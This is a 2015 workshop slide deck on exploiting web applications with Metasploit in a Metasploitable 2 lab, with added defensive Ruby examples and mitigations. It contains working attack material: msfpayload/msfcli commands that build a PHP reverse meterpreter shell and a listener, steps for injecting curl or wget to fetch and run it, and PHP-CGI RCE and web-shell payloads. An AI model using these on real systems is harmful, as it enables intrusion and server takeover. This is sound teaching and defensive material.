Metasploit for Web Workshop
Dennis Maldonado
@DennisMald
2015-02-20
• Application Security Specialist, WhiteHat Security
• Full-time student, University of Houston – Main Campus
  ▪ Computer Information Systems major
• Twitter: @DennisMald
• Website / Blog: KernelMeltdown.org
• Kali Linux – our attacker machine
• Metasploit Framework – used to exploit the target, generate the payload, and handle the session coming back from the victim
• Metasploitable 2 – the victim web server
Exploiting the backend server through a web application.
• Why attackers want to compromise the server:
  ▪ Run attacks against the internal network
  ▪ Use the server as a bot
  ▪ Install backdoors on the server
  ▪ Read sensitive files and passwords
  ▪ Execute any local file
  ▪ Execute remote files
  ▪ and more…
• Vulnerabilities that put the server itself at risk:
  ▪ Directory Traversal
  ▪ Local File Inclusion
  ▪ Remote File Inclusion
  ▪ Remote Code Execution
  ▪ SQL Injection
  ▪ Command Injection
[Demo slides: screenshots of the vulnerable requests; only the request URLs survive extraction]
http://website.com/?page=index.php
http://website.com/
http://website.com/user.php?id=1&Submit=Submit#
• Metasploit is an open-source framework for developing and testing exploits:
  ▪ Information gathering and fingerprinting
  ▪ Exploitation / penetration testing
  ▪ Payload generation and encoding
  ▪ Fuzzing
  ▪ And much more…
• Command-line interfaces
  ▪ msfconsole
  ▪ msfcli (removed from the framework later in 2015; msfconsole -x covers the same one-liner use)
• GUI interfaces
  ▪ Metasploit Community Edition
  ▪ Armitage
• Modules
  • Exploit – exploitation / proof-of-concept code
    ▪ Ruby on Rails exploit
    ▪ PHP-CGI exploit
  • Auxiliary – miscellaneous modules for many purposes
    ▪ Scanners
    ▪ DoS tools
    ▪ Fingerprinting
    ▪ Clients
  • Payloads – the code that runs on the exploited system
    ▪ System shells
    ▪ Meterpreter shells
  • Post – modules for post-exploitation tasks
    ▪ Persistence
    ▪ Password stealing
    ▪ Pivoting
• Active exploits
  ▪ Connect to a target host and exploit it directly
  ▪ Ex: Ruby on Rails XML exploit
• Passive exploits
  ▪ Start a listener, wait for hosts to connect, then exploit them (typical for browser and plugin bugs)
  ▪ Ex: Java 0-days
• Exploits carry payloads: the exploit gets code running, the payload is that code
• Inline (non-staged, "single") payloads
  ▪ The complete payload is delivered with the exploit in one piece
  ▪ Stable, but large
• Staged payloads
  ▪ The exploit delivers only a small stager; it connects to the attacker and pulls down the rest of the payload (the stage)
• Meterpreter
  ▪ Advanced, dynamic payload that runs in memory on the target
  ▪ Extended over the network: functionality is loaded on demand after the session is up
  ▪ Extensible through modules and plugins
• Types of connections
  ▪ Bind: a listener is started on the victim machine and the attacker connects to it
    windows/x64/shell/bind_tcp
  ▪ Reverse: the listener runs on the attacker machine and the victim connects out to it (usually the better choice through firewalls and NAT)
    windows/x64/shell/reverse_tcp
• CVE-2012-1823 – PHP-CGI argument injection: a query string with no "=" in it is handed to php-cgi as command-line arguments
  ▪ DoS: -T 10000 (runs the script in a loop)
  ▪ Source code disclosure: -s
  ▪ Remote code execution: -d (sets php.ini directives from the request)
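An added example (not part of the deck) of the check a defender would run over web-server access logs for this bug. The rule comes from RFC 3875 section 4.4 and the eindbazen advisory linked at the end of the deck: a query string with no unencoded "=" reaches php-cgi as argv, split on "+" and percent-decoded, so `?-s` and its encoded form `?%2d%73` are the same request. The function names and the sample request lines are constructed for this example; the -d directive pair in the last sample is the combination the advisory documents.

```ruby
# php-cgi command-line flags abused in CVE-2012-1823 (see the eindbazen
# advisory linked at the end of the deck).
PHP_CGI_FLAGS = {
  '-s' => 'source code disclosure',
  '-d' => 'php.ini directive injection (remote code execution)',
  '-T' => 'benchmark loop (denial of service)'
}.freeze

# Percent-decoding without "+"-to-space conversion (we split on "+" first).
def percent_decode(str)
  str.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# RFC 3875 section 4.4: when the query string contains no unencoded "=",
# the web server passes it to the CGI program as command-line arguments,
# split on "+" and percent-decoded. php-cgi then treated those arguments
# as its own options; that is the whole bug.
def cgi_argv(query)
  return [] if query.nil? || query.empty? || query.include?('=')
  query.split('+', -1).map { |arg| percent_decode(arg) }
end

# Inspect one HTTP request line. Returns nil for clean requests, otherwise
# the script path and the injected flags with their values.
def php_cgi_injection(request_line)
  m = request_line.match(%r{\A[A-Z]+\s+(\S+)\s+HTTP/})
  return nil unless m
  path, query = m[1].split('?', 2)
  argv = cgi_argv(query)
  hits = argv.each_with_index.filter_map do |arg, i|
    flag = PHP_CGI_FLAGS.keys.find { |f| arg.start_with?(f) }
    next unless flag
    # php-cgi accepts the value glued to the flag (-sfoo) or as the next argument
    value = arg.length > flag.length ? arg[flag.length..] : argv[i + 1]
    { flag: flag, value: value, why: PHP_CGI_FLAGS[flag] }
  end
  hits.empty? ? nil : { path: path, hits: hits }
end

# Constructed sample access-log request lines (not from the deck).
SAMPLE_REQUESTS = [
  'GET /index.php?page=home HTTP/1.1',        # normal: contains "="
  'GET /search.php?q=-s HTTP/1.1',            # "=" present, so never argv
  'GET /index.php?-s HTTP/1.1',               # source disclosure
  'GET /index.php?%2d%73 HTTP/1.1',           # the same, with "-s" percent-encoded
  'GET /index.php?-T+10000 HTTP/1.1',         # CPU-burning loop
  'POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1' # RCE
].freeze

# Returns [request_line, [flags...]] for every flagged request.
def scan_requests(lines = SAMPLE_REQUESTS)
  lines.filter_map do |line|
    finding = php_cgi_injection(line)
    finding && [line, finding[:hits].map { |h| h[:flag] }]
  end
end

scan_requests.each { |line, flags| puts "#{flags.join(' ')}  <- #{line}" } if $PROGRAM_NAME == __FILE__
```

The "=" test is the important one: a naive filter that looks for the literal string "-s" misses the percent-encoded variant, while a filter that blocks every leading "-" also fires on harmless values like `q=-s`, which the server never turns into argv.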
• CVE-2013-0156 – Ruby on Rails XML parameter parsing
  ▪ Easy to find, easy to exploit, critical vulnerability
  ▪ Requires just one POST request with specially crafted XML in the body
  ▪ An XML parameter can declare type="yaml"; the value is handed to YAML.load, which instantiates arbitrary Ruby objects and leads to code execution
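The mechanism behind that slide, as an added Ruby example that is not part of the deck or of Rails itself: a cut-down version of the typed-parameter conversion Rails applied to XML bodies, with the conversion table before and after the 3.2.11 fix. `AuditLogEntry`, `parse_xml_params` and the XML body are constructed for the example; the advisory also recommended disabling XML parameter parsing entirely where an application did not need it.

```ruby
require 'yaml'

# Stand-in for any class already loaded in the application; the point is
# that the attacker, not the application, decides which class gets built.
class AuditLogEntry
  attr_accessor :action
end

# Rails 3.2.10 called YAML.load, which in the Psych of that era built
# arbitrary objects. Ruby 3.1+ (Psych 4) made YAML.load safe, so the old
# behaviour is reached through YAML.unsafe_load where it exists.
def legacy_yaml_load(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Typed-value conversions in the style of ActiveSupport::XmlMini::PARSING.
VULNERABLE_PARSING = {
  'integer' => ->(v) { v.to_i },
  'boolean' => ->(v) { %w[true 1].include?(v.strip) },
  'symbol'  => ->(v) { v.to_sym },             # removed by the fix (symbols were never freed: DoS)
  'yaml'    => ->(v) { legacy_yaml_load(v) }    # removed by the fix (arbitrary object instantiation)
}.freeze

# The Rails 3.2.11 fix: drop "yaml" and "symbol" from the table, so values
# with those types fall through as plain strings.
FIXED_PARSING = VULNERABLE_PARSING.reject { |type, _| %w[symbol yaml].include?(type) }.freeze

# Tiny leaf-element parser for <name type="...">text</name>. Rails used a
# real XML parser; the type dispatch below is the part that mattered.
def parse_xml_params(xml, parsing)
  xml.scan(%r{<(\w+)(?:\s+type="(\w+)")?>([^<]*)</\1>}).each_with_object({}) do |(name, type, text), params|
    conv = parsing[type]
    params[name] = conv ? conv.call(text) : text   # unknown or missing type: keep the string
  end
end

# Constructed request body: the "yaml" type smuggles a Ruby object tag.
MALICIOUS_XML = "<params>\n" \
  "  <id type=\"integer\">7</id>\n" \
  "  <note type=\"yaml\">--- !ruby/object:AuditLogEntry\naction: hijacked\n</note>\n" \
  "</params>\n"

def demo_rails_xml
  {
    vulnerable: parse_xml_params(MALICIOUS_XML, VULNERABLE_PARSING),
    fixed: parse_xml_params(MALICIOUS_XML, FIXED_PARSING)
  }
end
```

With the vulnerable table the `note` parameter comes back as a live `AuditLogEntry` object that the application never asked for; with the fixed table it is the untouched string, which is all a parameter should ever be.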
• The upload feature accepts any file type
  1. Upload a small piece of server-side code and check whether it executes (the page should show the output, not the source):
     ▪ PHP: <?php echo "HelloWorld!"; ?>
     ▪ ASP: <% Response.Write "HelloWorld!" %>
     ▪ JSP: <%= new java.util.Date().toString() %>
  2. Use msfpayload to create a shell
  3. Use msfcli to listen for the connection from the victim
  4. Upload the shell and execute it by requesting it
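The defender's side of this check, as an added example (not code from the deck): an upload gate that applies the mitigations listed at the end of the deck, extension whitelist, content check and rename. `vet_upload`, `ALLOWED_UPLOADS` and the sample files are constructed for the example; the sample set includes the three probe files from the slide above. The multipart Content-Type header is attacker-supplied, so the file's leading bytes are checked instead.

```ruby
require 'securerandom'

# extension => magic bytes the content must start with
ALLOWED_UPLOADS = {
  'png' => "\x89PNG\r\n\x1a\n".b,
  'jpg' => "\xFF\xD8\xFF".b,
  'gif' => "GIF8".b,
  'pdf' => "%PDF".b
}.freeze

# Markers of server-side code, whatever the extension claims. Covers the
# PHP, ASP and JSP probes from the slide.
SERVER_CODE = [/<\?php/i, /<\?=/, /<%/, /<script\s+runat=/i].freeze

class UploadRejected < StandardError; end

# Returns the random on-disk name the file should be stored under.
# client_name: filename from the multipart header (attacker-controlled)
# content:     raw bytes of the upload
def vet_upload(client_name, content)
  # 1. Only the final extension counts, and it must be whitelisted.
  #    "shell.png.php" fails here; "shell.php.png" goes on to the byte check.
  ext = File.extname(client_name).delete_prefix('.').downcase
  raise UploadRejected, "extension #{ext.inspect} not allowed" unless ALLOWED_UPLOADS.key?(ext)

  # 2. The bytes must match the type the extension claims.
  bytes = content.b
  raise UploadRejected, "content does not look like #{ext}" unless bytes.start_with?(ALLOWED_UPLOADS[ext])

  # 3. Reject polyglots: a valid image header with code behind it is still
  #    code if the upload directory turns out to be executable.
  raise UploadRejected, 'embedded server-side code' if SERVER_CODE.any? { |re| bytes.match?(re) }

  # 4. Never keep the client's name (no path tricks, no "a.php.png" for
  #    Apache's multiple-extension handling): random name, vetted extension.
  "#{SecureRandom.hex(16)}.#{ext}"
end

# Constructed samples: the three probes from the slide, a real PNG header,
# an extension trick and a polyglot.
SAMPLE_UPLOADS = {
  'avatar.png'    => "\x89PNG\r\n\x1a\n".b + ("\x00" * 16).b,
  'shell.php'     => '<?php echo "HelloWorld!"; ?>',
  'shell.asp'     => '<% Response.Write "HelloWorld!" %>',
  'shell.jsp'     => '<%= new java.util.Date().toString() %>',
  'shell.php.png' => '<?php echo "HelloWorld!"; ?>',
  'poly.gif'      => 'GIF89a<?php system($_GET["c"]); ?>'
}.freeze

# Maps each sample name to its stored name or a "REJECTED: reason" string.
def triage_uploads(files = SAMPLE_UPLOADS)
  files.to_h do |name, bytes|
    stored = begin
      vet_upload(name, bytes)
    rescue UploadRejected => e
      "REJECTED: #{e.message}"
    end
    [name, stored]
  end
end
```

Making the upload directory non-executable is a web-server setting rather than application code and is not shown here; it is the layer that catches whatever a check like this one misses.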
• Command injection lets an attacker run system-level commands on the server
  1. Try a harmless command first to confirm execution:
     ▪ echo test
     ▪ uname -a
  2. Use msfpayload to create a shell
  3. Use msfcli to listen for the connection from the victim
  4. Inject a curl or wget command to download the shell onto the victim machine
  5. chmod it if necessary and execute it
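The root cause of the command injection above and its fix, as an added Ruby example that is not from the deck: the same feature written with string interpolation (goes through a shell) and with an argv array (no shell), run against a constructed injection string. `run_unsafe`, `run_safe`, `HOSTNAME_RE` and the demo input are this example's own; echo stands in for ping so the block runs offline.

```ruby
require 'open3'

# Vulnerable pattern: the parameter is interpolated into one string. When
# that string contains shell metacharacters Ruby runs it through
# "/bin/sh -c", so ; | && $( ) and backticks are all honoured.
def run_unsafe(command_prefix, user_input)
  out, _status = Open3.capture2e("#{command_prefix} #{user_input}")
  out
end

# Fixed pattern: argv form. With several arguments Ruby exec()s the program
# directly; user_input becomes exactly one argument no matter what it
# contains. The same rule applies to system(), spawn() and IO.popen.
def run_safe(argv, user_input)
  out, _status = Open3.capture2e(*argv, user_input)
  out
end

# Defence in depth: even with argv form, validate the value against what
# the feature actually needs (here, a host name for a ping-style lookup).
HOSTNAME_RE = /\A(?=.{1,253}\z)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*\z/i

def valid_hostname?(value)
  value.match?(HOSTNAME_RE)
end

# Constructed attacker input: a host name followed by a second command.
DEMO_INPUT = 'target.example; echo INJECTED'

# echo replaces ping so the demo runs anywhere; the injection behaves the
# same with ping, id, curl or wget as the prefix.
def demo_command_injection
  {
    unsafe: run_unsafe('echo pinging', DEMO_INPUT),
    safe: run_safe(%w[echo pinging], DEMO_INPUT),
    validated: valid_hostname?(DEMO_INPUT)
  }
end
```

The unsafe call prints two lines because the shell executed two commands; the safe call prints one line in which the whole injection string is just the text that was echoed. The deck's step 4 (inject curl or wget) is exactly the second command in the unsafe case.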
• msfpayload php/meterpreter/reverse_tcp O
  (O = list the payload's options)
• msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O
  (options again, now with the listener address and port filled in)
• msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php
  (R = raw output, written to shell.php)
• Now edit shell.php: remove the comment marker on the first line so the <?php tag is live, and add "?>" at the end of the file.
==================================
• msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
  (E = execute the handler; it waits for the PHP payload to connect back)
• Note: msfpayload and msfcli were removed from Metasploit in mid-2015; today msfvenom generates the payload and "use exploit/multi/handler" inside msfconsole provides the listener.
• Keep software up to date!
  ▪ PHP: 5.4.3 / 5.3.13 (complete fix for CVE-2012-1823 and its follow-up CVE-2012-2311)
  ▪ Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15 (fix for CVE-2013-0156)
• File uploads
  ▪ Whitelist the allowed extensions; check both the extension and the actual content, not just the declared content type
  ▪ Don't let the upload directory be executable
  ▪ Rename uploaded files if possible (never keep the client's file name)
• Command execution
  ▪ Don't pass user input to a system command!
  ▪ Use library calls instead of shelling out when possible
  ▪ Validate input against an allowlist of what the feature needs
• Kali Linux (successor of BackTrack Linux)
  http://www.kali.org/
• The Metasploit Project
  http://www.metasploit.com/
• Metasploit Unleashed
  http://www.offensive-security.com/metasploit-unleashed/
• PHP-CGI advisory (CVE-2012-1823)
  http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
• Ruby on Rails exploitation (CVE-2013-0156)
  https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
• Damn Vulnerable Web Application (DVWA)
  http://www.dvwa.co.uk/
• Metasploitable 2
  http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web
